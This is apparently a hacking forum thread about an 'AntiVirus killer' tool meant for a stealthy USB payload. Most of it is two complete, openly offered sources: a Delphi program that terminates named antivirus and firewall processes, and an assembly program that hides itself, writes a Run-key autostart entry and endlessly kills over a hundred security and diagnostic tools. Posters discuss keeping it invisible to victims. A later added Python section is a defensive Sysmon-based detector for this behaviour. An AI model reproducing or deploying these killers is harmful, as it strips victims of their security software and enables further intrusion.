
AntiVirus killer


moonlit


Hmm... been doing some thinking, the project will be back online and firing on all cylinders... the source will be around but I'll make it a little more difficult (but by no means impossible) to find...

I'll put the links up again in the next couple of days and I'll even try to get another version ready for when I do ^_^


Maybe these might help

VorteX

Dec 30 2003, 05:24 PM

Compile your own undetected one; here is an example in Delphi:



```pascal
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  Tlhelp32, StdCtrls;

type
  TForm1 = class(TForm)
    GroupBox1: TGroupBox;
    Button1: TButton;
    Button2: TButton;
    Button3: TButton;
    Button4: TButton;
    Button5: TButton;
    Button6: TButton;
    Button7: TButton;
    Button8: TButton;
    Button9: TButton;
    Button10: TButton;
    Button11: TButton;
    Button12: TButton;
    Button13: TButton;
    Button14: TButton;
    Button15: TButton;
    GroupBox2: TGroupBox;
    Button16: TButton;
    Button17: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
    procedure Button3Click(Sender: TObject);
    procedure Button4Click(Sender: TObject);
    procedure Button5Click(Sender: TObject);
    procedure Button6Click(Sender: TObject);
    procedure Button7Click(Sender: TObject);
    procedure Button8Click(Sender: TObject);
    procedure Button9Click(Sender: TObject);
    procedure Button10Click(Sender: TObject);
    procedure Button11Click(Sender: TObject);
    procedure Button12Click(Sender: TObject);
    procedure Button13Click(Sender: TObject);
    procedure Button14Click(Sender: TObject);
    procedure Button15Click(Sender: TObject);
    procedure Button16Click(Sender: TObject);
    procedure Button17Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.DFM}

function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE = $0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  Result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);

  while Integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName))
      or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, BOOL(0),
        FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;

procedure killavp;
begin
  try
    KillTask('_AVP32.EXE');
    KillTask('_AVPCC.EXE');
    KillTask('_AVPM.EXE');
    KillTask('AVP32.EXE');
    KillTask('AVPCC.EXE');
    KillTask('AVPM.EXE');
    KillTask('AVP.EXE');
  except
    Exit;
  end;
end;

procedure killnav;
begin
  try
    KillTask('NAVAPW32.EXE');
    KillTask('NAVW32.EXE');
  except
    Exit;
  end;
end;

procedure killsophos;
begin
  try
    KillTask('ICLOAD95.EXE');
    KillTask('ICMON.EXE');
    KillTask('ICSUPP95.EXE');
    KillTask('ICLOADNT.EXE');
    KillTask('ICSUPPNT.EXE');
  except
    Exit;
  end;
end;

procedure killpanda;
begin
  try
    KillTask('IFACE.EXE');
  except
    Exit;
  end;
end;

procedure killants;
begin
  try
    KillTask('ANTS.EXE');
  except
    Exit;
  end;
end;

procedure killantitrojan;
begin
  try
    KillTask('Anti-Trojan.exe');
  except
    Exit;
  end;
end;

procedure killatguard;
begin
  try
    KillTask('iamapp.exe');
    KillTask('iamserv.exe');
  except
    Exit;
  end;
end;

procedure killconseal;
begin
  try
    KillTask('FRW.EXE');
  except
    Exit;
  end;
end;

procedure killblackice;
begin
  try
    KillTask('blackice.exe');
    KillTask('blackd.exe');
  except
    Exit;
  end;
end;

procedure killzonealarm;
begin
  try
    KillTask('zonealarm.exe');
    KillTask('vsmon.exe');
  except
    Exit;
  end;
end;

procedure killwinroute;
begin
  try
    KillTask('WrCtrl.exe');
    KillTask('WrAdmin.exe');
    KillTask('WrCtrl.exe');
  except
    Exit;
  end;
end;

procedure killcleaner;
begin
  try
    KillTask('cleaner3.exe');
    KillTask('cleaner.exe');
    KillTask('tca.exe');
    KillTask('MooLive.exe');
  except
    Exit;
  end;
end;

procedure killlockdown;
begin
  try
    KillTask('lockdown2000.exe');
  except
    Exit;
  end;
end;

procedure killsphinx;
begin
  try
    KillTask('Sphinx.exe');
  except
    Exit;
  end;
end;

procedure killmcafee;
begin
  try
    KillTask('VSHWIN32.EXE');
    KillTask('VSECOMR.EXE');
    KillTask('WEBSCANX.EXE');
    KillTask('AVCONSOL.EXE');
    KillTask('VSSTAT.EXE');
  except
    Exit;
  end;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  killavp;
end;

procedure TForm1.Button2Click(Sender: TObject);
begin
  killnav;
end;

procedure TForm1.Button3Click(Sender: TObject);
begin
  killsophos;
end;

procedure TForm1.Button4Click(Sender: TObject);
begin
  killpanda;
end;

procedure TForm1.Button5Click(Sender: TObject);
begin
  killants;
end;

procedure TForm1.Button6Click(Sender: TObject);
begin
  killantitrojan;
end;

procedure TForm1.Button7Click(Sender: TObject);
begin
  killatguard;
end;

procedure TForm1.Button8Click(Sender: TObject);
begin
  killconseal;
end;

procedure TForm1.Button9Click(Sender: TObject);
begin
  killblackice;
end;

procedure TForm1.Button10Click(Sender: TObject);
begin
  killzonealarm;
end;

procedure TForm1.Button11Click(Sender: TObject);
begin
  killwinroute;
end;

procedure TForm1.Button12Click(Sender: TObject);
begin
  killcleaner;
end;

procedure TForm1.Button13Click(Sender: TObject);
begin
  killlockdown;
end;

procedure TForm1.Button14Click(Sender: TObject);
begin
  killsphinx;
end;

procedure TForm1.Button15Click(Sender: TObject);
begin
  killmcafee;
end;

procedure TForm1.Button16Click(Sender: TObject);
begin
  killmcafee;
  Sleep(1000);
  killsphinx;
  Sleep(1000);
  killlockdown;
  Sleep(1000);
  killcleaner;
  Sleep(1000);
  killwinroute;
  Sleep(1000);
  killzonealarm;
  Sleep(1000);
  killblackice;
  Sleep(1000);
  killconseal;
  Sleep(1000);
  killatguard;
  Sleep(1000);
  killantitrojan;
  Sleep(1000);
  killants;
  Sleep(1000);
  killsophos;
  Sleep(1000);
  killnav;
  Sleep(1000);
  killavp;
end;

procedure TForm1.Button17Click(Sender: TObject);
begin
  ShowMessage('This program is designed to kill all the listed antivirus and firewall programs, you can kill each individually or all together! enjoy');
end;

end.
```

VorteX

Dec 30 2003, 05:27 PM

or one in asm:

```asm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; AVKillah 2 by Phr0stic
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.386
.model flat, stdcall
option casemap:none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  getfile proto :dword,:dword
  FindMe proto :dword
  pe32 struct
     dwSize dword ?
     cntUsage dword ?
     ID dword ?
     th32DefaultHeapID dword ?
     th32ModuleID dword ?
     cntThreads dword ?
     th32ParentProcessID dword ?
     pcPriClassBase dword ?
     dwFlags dword ?
     szExe db 260 dup(?)
  pe32 ends
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.const
  sz000 db "regedit.exe",0
  sz001 db "netstat.exe",0
  sz002 db "tracert.exe",0
  sz003 db "msconfig.exe",0
  sz004 db "sysedit.exe",0
  sz005 db "zapro.exe",0
  sz006 db "zonealarm.exe",0
  sz007 db "zatutor.exe",0
  sz008 db "zauinst.exe",0
  sz009 db "minilog.exe",0
  sz010 db "vsmon.exe",0
  sz011 db "navapw32.exe",0
  sz012 db "lockdown.exe",0
  sz013 db "ants.exe",0
  sz014 db "fast.exe",0
  sz015 db "guard.exe",0
  sz016 db "update.exe",0
  sz017 db "autoupdate.exe",0
  sz018 db "tc.exe",0
  sz019 db "spyxx.exe",0
  sz020 db "clean.exe",0
  sz021 db "pview95.exe",0
  sz022 db "drwatson.exe",0
  sz023 db "sfc.exe",0
  sz024 db "msinfo32.exe",0
  sz025 db "nsched32.exe",0
  sz026 db "cleaner.exe",0
  sz027 db "lsetup.exe",0
  sz028 db "aupdate.exe",0
  sz029 db "luall.exe",0
  sz030 db "lucomserver.exe",0
  sz031 db "luinit.exe",0
  sz032 db "navw32.exe",0
  sz033 db "navstub.exe",0
  sz034 db "bootwarn.exe",0
  sz035 db "qconsole.exe",0
  sz036 db "qserver.exe",0
  sz037 db "navdx.exe",0
  sz038 db "undoboot.exe",0
  sz039 db "cfgwiz.exe",0
  sz040 db "moolive.exe",0
  sz041 db "tca.exe",0
  sz042 db "tcm.exe",0
  sz043 db "tds-3.exe",0
  sz044 db "ss3edit.exe",0
  sz045 db "update.exe",0
  sz046 db "anti-trojan.exe",0
  sz047 db "atcon.exe",0
  sz048 db "atupdater.exe",0
  sz049 db "atwatch.exe",0
  sz050 db "wgfe95.exe",0
  sz051 db "poproxy.exe",0
  sz052 db "nprotect.exe",0
  sz053 db "vsstat.exe",0
  sz054 db "vshwin32.exe",0
  sz055 db "ndd32.exe",0
  sz056 db "mcagent.exe",0
  sz057 db "mcupdate.exe",0
  sz058 db "avpcc.exe",0
  sz059 db "avpm.exe",0
  sz060 db "watchdog.exe",0
  sz061 db "taumon.exe",0
  sz062 db "iamapp.exe",0
  sz063 db "iamserv.exe",0
  sz064 db "lockdown2000.exe",0
  sz065 db "sphinx.exe",0
  sz066 db "avconsol.exe",0
  sz067 db "webscanx.exe",0
  sz068 db "vsecomr.exe",0
  sz069 db "_avp32.exe",0
  sz070 db "_avpcc.exe",0
  sz071 db "_avpm.exe",0
  sz072 db "avp32.exe",0
  sz073 db "avpcc.exe",0
  sz074 db "avp.exe",0
  sz075 db "pcciomon.exe",0
  sz076 db "icload95.exe",0
  sz077 db "icmon.exe",0
  sz078 db "icsupp95.exe",0
  sz079 db "icloadnt.exe",0
  sz080 db "icsuppnt.exe",0
  sz081 db "frw.exe",0
  sz082 db "firewall.exe",0
  sz083 db "antivirus.exe",0
  sz084 db "blackice.exe",0
  sz085 db "blackd.exe",0
  sz086 db "wrctrl.exe",0
  sz087 db "wradmin.exe",0
  sz088 db "cleaner3.exe",0
  sz089 db "pcfwallicon.exe",0
  sz090 db "aplica32.exe",0
  sz091 db "cfiadmin.exe",0
  sz092 db "cfiaudit.exe",0
  sz093 db "cfinet32.exe",0
  sz094 db "cfinet.exe",0
  sz095 db "tds2-98.exe",0
  sz096 db "tds2-nt.exe",0
  sz097 db "safeweb.exe",0
  sz098 db "nvarch16.exe",0
  sz099 db "vsmain.exe",0
  sz100 db "persfw.exe",0
  sz101 db "avsynmgr.exe",0
  sz102 db "pavproxy.exe",0
  sz103 db "mssmmc32.exe",0
  sz104 db "trjscan.exe",0
  sz105 db "defwatch.exe",0
  sz106 db "vpc42.exe",0
  sz107 db "rtvscn95.exe",0
  sz108 db "vptray.exe",0
  sz109 db "mgui.exe",0
  sz110 db "apvxdwin.exe",0
  sz111 db "fsav.exe",0
  sz112 db "agentsvr.exe",0
  sz113 db "nmain.exe",0
  sz114 db "nisum.exe",0
  sz115 db "nisserv.exe",0
  sz116 db "taskmon.exe",0
  sz117 db "rrguard.exe",0
  sz118 db "rescue32.exe",0
  sz119 db "rescue.exe",0
  sz120 db "rshell.exe",0
  sz121 db "apimonitor.exe",0
  sz122 db "borg2.exe",0
  sz123 db "W32dsm89.exe",0
  sz124 db "cleanpc.exe",0
  szK32 db "kernel32.dll",0
  szRSP db "RegisterServiceProcess",0
  szRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
  szReg db "SysEnum",0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.data?
  hReg dd ?
  szPath db 256 dup(?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.code
start:
  invoke GetModuleHandle, addr szK32
  invoke GetProcAddress, eax, addr szRSP
  test eax, eax
  jz addme
  push 1
  push 0
  call eax
addme:
  invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg
  invoke GetModuleFileName, 0, addr szPath, sizeof szPath
  invoke RegSetValueEx, hReg, addr szReg, 0, 1, addr szPath, eax
  invoke RegCloseKey, hReg
hey:
  invoke FindMe, addr sz001
  invoke FindMe, addr sz002
  invoke FindMe, addr sz003
  invoke FindMe, addr sz004
  invoke FindMe, addr sz005
  invoke FindMe, addr sz006
  invoke FindMe, addr sz007
  invoke FindMe, addr sz008
  invoke FindMe, addr sz009
  invoke FindMe, addr sz010
  invoke FindMe, addr sz011
  invoke FindMe, addr sz012
  invoke FindMe, addr sz013
  invoke FindMe, addr sz014
  invoke FindMe, addr sz015
  invoke FindMe, addr sz016
  invoke FindMe, addr sz017
  invoke FindMe, addr sz018
  invoke FindMe, addr sz019
  invoke FindMe, addr sz020
  invoke FindMe, addr sz021
  invoke FindMe, addr sz022
  invoke FindMe, addr sz023
  invoke FindMe, addr sz024
  invoke FindMe, addr sz025
  invoke FindMe, addr sz026
  invoke FindMe, addr sz027
  invoke FindMe, addr sz028
  invoke FindMe, addr sz029
  invoke FindMe, addr sz030
  invoke FindMe, addr sz031
  invoke FindMe, addr sz032
  invoke FindMe, addr sz033
  invoke FindMe, addr sz034
  invoke FindMe, addr sz035
  invoke FindMe, addr sz036
  invoke FindMe, addr sz037
  invoke FindMe, addr sz038
  invoke FindMe, addr sz039
  invoke FindMe, addr sz040
  invoke FindMe, addr sz041
  invoke FindMe, addr sz042
  invoke FindMe, addr sz043
  invoke FindMe, addr sz044
  invoke FindMe, addr sz045
  invoke FindMe, addr sz046
  invoke FindMe, addr sz047
  invoke FindMe, addr sz048
  invoke FindMe, addr sz049
  invoke FindMe, addr sz050
  invoke FindMe, addr sz051
  invoke FindMe, addr sz052
  invoke FindMe, addr sz053
  invoke FindMe, addr sz054
  invoke FindMe, addr sz055
  invoke FindMe, addr sz056
  invoke FindMe, addr sz057
  invoke FindMe, addr sz058
  invoke FindMe, addr sz059
  invoke FindMe, addr sz060
  invoke FindMe, addr sz061
  invoke FindMe, addr sz062
  invoke FindMe, addr sz063
  invoke FindMe, addr sz064
  invoke FindMe, addr sz065
  invoke FindMe, addr sz066
  invoke FindMe, addr sz067
  invoke FindMe, addr sz068
  invoke FindMe, addr sz069
  invoke FindMe, addr sz070
  invoke FindMe, addr sz071
  invoke FindMe, addr sz072
  invoke FindMe, addr sz073
  invoke FindMe, addr sz074
  invoke FindMe, addr sz075
  invoke FindMe, addr sz076
  invoke FindMe, addr sz077
  invoke FindMe, addr sz078
  invoke FindMe, addr sz079
  invoke FindMe, addr sz080
  invoke FindMe, addr sz081
  invoke FindMe, addr sz082
  invoke FindMe, addr sz083
  invoke FindMe, addr sz084
  invoke FindMe, addr sz085
  invoke FindMe, addr sz086
  invoke FindMe, addr sz087
  invoke FindMe, addr sz088
  invoke FindMe, addr sz089
  invoke FindMe, addr sz090
  invoke FindMe, addr sz091
  invoke FindMe, addr sz092
  invoke FindMe, addr sz093
  invoke FindMe, addr sz094
  invoke FindMe, addr sz095
  invoke FindMe, addr sz096
  invoke FindMe, addr sz097
  invoke FindMe, addr sz098
  invoke FindMe, addr sz099
  invoke FindMe, addr sz100
  invoke FindMe, addr sz101
  invoke FindMe, addr sz102
  invoke FindMe, addr sz103
  invoke FindMe, addr sz104
  invoke FindMe, addr sz105
  invoke FindMe, addr sz106
  invoke FindMe, addr sz107
  invoke FindMe, addr sz108
  invoke FindMe, addr sz109
  invoke FindMe, addr sz110
  invoke FindMe, addr sz111
  invoke FindMe, addr sz112
  invoke FindMe, addr sz113
  invoke FindMe, addr sz114
  invoke FindMe, addr sz115
  invoke FindMe, addr sz116
  invoke FindMe, addr sz117
  invoke FindMe, addr sz118
  invoke FindMe, addr sz119
  invoke FindMe, addr sz120
  invoke FindMe, addr sz121
  invoke FindMe, addr sz122
  invoke FindMe, addr sz123
  invoke FindMe, addr sz124
  jmp hey
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
FindMe proc szFile:dword
  local lpMoop32:pe32
  local szBuffer[256]:byte

  mov lpMoop32.dwSize, sizeof lpMoop32
  invoke CreateToolhelp32Snapshot, 2, 0
  mov esi, eax
  lea edi, szFile
  invoke Process32First, esi, addr lpMoop32
@@loop:
  invoke getfile, addr lpMoop32.szExe, addr szBuffer
  invoke lstrcmpiA, edi, addr szBuffer
  test eax, eax
  jnz @@continue
  invoke OpenProcess, 0001h, 0, lpMoop32.ID
  invoke TerminateProcess, eax, 0
@@continue:
  invoke Process32Next, esi, addr lpMoop32
  test eax, eax
  jz @@done
  jmp @@loop
@@done:
  invoke CloseHandle, esi
  ret
FindMe endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
getfile proc lppath:dword,lpbuffer:dword
  push edi
  mov ecx, lppath
@@:
  mov al, [ecx]
  inc ecx
  cmp al, 0
  je @f
  cmp al, "\"
  jne @b
  mov edx, ecx
  jmp @b
@@:
  sub ecx, lppath
  add ecx, edx
  mov edi, lpbuffer
@@:
  mov al, [edx]
  inc edx
  mov [edi], al
  inc edi
  cmp edx, ecx
  jne @b
  pop edi
  ret
getfile endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
end start
```

Sorry for the long post. I just thought it would be more convenient to post it here.

They were both found here and as you can tell they are old.

http://www.governmentsecurity.org/archive/t1731.html

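As an added detection example (not code from the thread or from either listing's author): both killers call OpenProcess with PROCESS_TERMINATE before TerminateProcess, and on a host running Sysmon each such call is recorded as Event ID 10 (ProcessAccess) with that bit set in GrantedAccess. The script below parses constructed, simplified records of that event and flags a source process that requests PROCESS_TERMINATE on several security-product processes within seconds; the record layout, file paths and process names in the sample are assumptions built from the lists above.

```python
# Added example, not code from the thread. Both listings above open each
# target with PROCESS_TERMINATE (0x0001) before TerminateProcess; on a host
# running Sysmon that call is an Event ID 10 (ProcessAccess) record, so the
# check below flags one source that does it to several security processes
# within seconds. The records are constructed, not real telemetry.
from collections import defaultdict
from datetime import datetime, timedelta

PROCESS_TERMINATE = 0x0001

# Subset of the executable names targeted by the two listings.
SECURITY_PROCESSES = {
    "avp.exe", "avp32.exe", "avpcc.exe", "navapw32.exe", "navw32.exe",
    "vsmon.exe", "zonealarm.exe", "blackice.exe", "blackd.exe",
    "vshwin32.exe", "icmon.exe", "frw.exe", "iamapp.exe",
}

# Constructed, simplified Event ID 10 records:
# UtcTime|SourceImage|SourceProcessId|TargetImage|GrantedAccess
SAMPLE_LOG = """\
2024-01-01 10:00:00.000|C:\\Users\\u\\sysenum.exe|4120|C:\\Program Files\\AV\\avp.exe|0x1
2024-01-01 10:00:00.050|C:\\Users\\u\\sysenum.exe|4120|C:\\Program Files\\AV\\avpcc.exe|0x1
2024-01-01 10:00:00.100|C:\\Users\\u\\sysenum.exe|4120|C:\\Program Files\\ZA\\vsmon.exe|0x1
2024-01-01 10:00:00.150|C:\\Users\\u\\sysenum.exe|4120|C:\\Program Files\\ZA\\zonealarm.exe|0x1
2024-01-01 10:00:01.000|C:\\Windows\\System32\\taskmgr.exe|900|C:\\Program Files\\AV\\avp.exe|0x1
2024-01-01 10:00:02.000|C:\\Windows\\System32\\svchost.exe|612|C:\\Program Files\\AV\\avp.exe|0x1000
2024-01-01 10:30:00.000|C:\\Windows\\System32\\taskmgr.exe|900|C:\\Program Files\\ZA\\vsmon.exe|0x1
"""

def parse_event(line):
    """Split one record into a dict; GrantedAccess is decoded as a hex mask."""
    ts, src, pid, target, access = line.split("|")
    return {
        "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"),
        "source": src,
        "pid": int(pid),
        "target": target.rsplit("\\", 1)[-1].lower(),  # basename, as the killers match
        "access": int(access, 16),
    }

def find_mass_terminators(log_text, min_targets=3, window=timedelta(seconds=10)):
    """Return {(source_image, pid): sorted targets} for each source that asked
    for PROCESS_TERMINATE on >= min_targets distinct security processes within
    one sliding window; taskmgr ending one AV process half an hour apart is not a hit."""
    per_source = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_event(line)
        if e["access"] & PROCESS_TERMINATE and e["target"] in SECURITY_PROCESSES:
            per_source[(e["source"], e["pid"])].append(e)
    hits = {}
    for key, evs in per_source.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            seen = {e["target"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(seen) >= min_targets:
                hits[key] = sorted(seen)
                break
    return hits
```

Sysmon Event ID 13 (RegistryEvent, value set) on the Run key written by the asm listing is the natural second signal to correlate with the same source process.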

It's currently not as yet, I've got a lot on atm (teaches me to try and stretch myself, eh?), it'll hopefully be up tonight (tonight GMT) along with the binaries again :)

could ya mail me a link? I prolly won't be on @ that moment :,(

btw would you mind if I hack the Hak5 logo on it?


Nah I'm working on a few things right now and don't really have time to upload right now but I will have it up asap...

Sure, you can put a Hak5 logo in there but you won't see it, the whole thing's invisible ;)


lol. yeah, having a hak5 logo pop up wouldn't be too stealthy.

Then again, we could have a Hak5 logo pop up and say "Please disable your antivirus".... That might actually work.... AND it would have 100% compatibility with all AV clients!


lol. yeah, having a hak5 logo pop up wouldn't be too stealthy.

Then again, we could have a Hak5 logo pop up and say "Please disable your antivirus".... That might actually work.... AND it would have 100% compatibility with all AV clients!

Yeah, it might kinda miss the point of it being automatic though ;)

Oh, and DLSS: I see what you mean now, a Hak5 icon... sure!


This is cool, not even SmartClose will close my NOD32 processes, so this might be cool. Yeh, not just on Switchblade; I mean I would run this just before a gaming session to make sure all processing power is going to the game, not some antivirus thing that is still running.
